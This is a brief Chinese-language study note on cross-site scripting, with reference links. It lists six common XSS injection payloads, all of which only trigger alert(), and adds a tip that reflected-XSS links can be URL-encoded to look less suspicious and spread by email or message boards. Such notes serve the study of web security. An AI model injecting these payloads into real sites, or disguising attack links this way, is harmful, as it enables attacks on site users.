參考資料:https://medium.com/starbugs/身為-web-工程師-你一定要知道的幾個-web-資訊安全議題-29b8a4af6e13
參考資料:https://yakimhsu.com/project/project_w12_Info_Security-XSS_SQL.html
參考資料:https://forum.gamer.com.tw/Co.php?bsn=60292&sn=11267
在以下地方都可以插入 javascript 語法:
<script>alert('666')</script>
<svg/onload=alert(1)>
<img src=# onerror=alert(1)>
<a href="javascript:alert(1)">g</a>
<input type="text" value="g" onmouseover="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
反射型 XSS 腳本可以使用 URL encoding,讓網址看起來沒那麼可疑,通常此類攻擊連結可以透過廣告信件、留言板等,讓受害者點擊
參考資料:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
參考資料:https://ithelp.ithome.com.tw/articles/10243506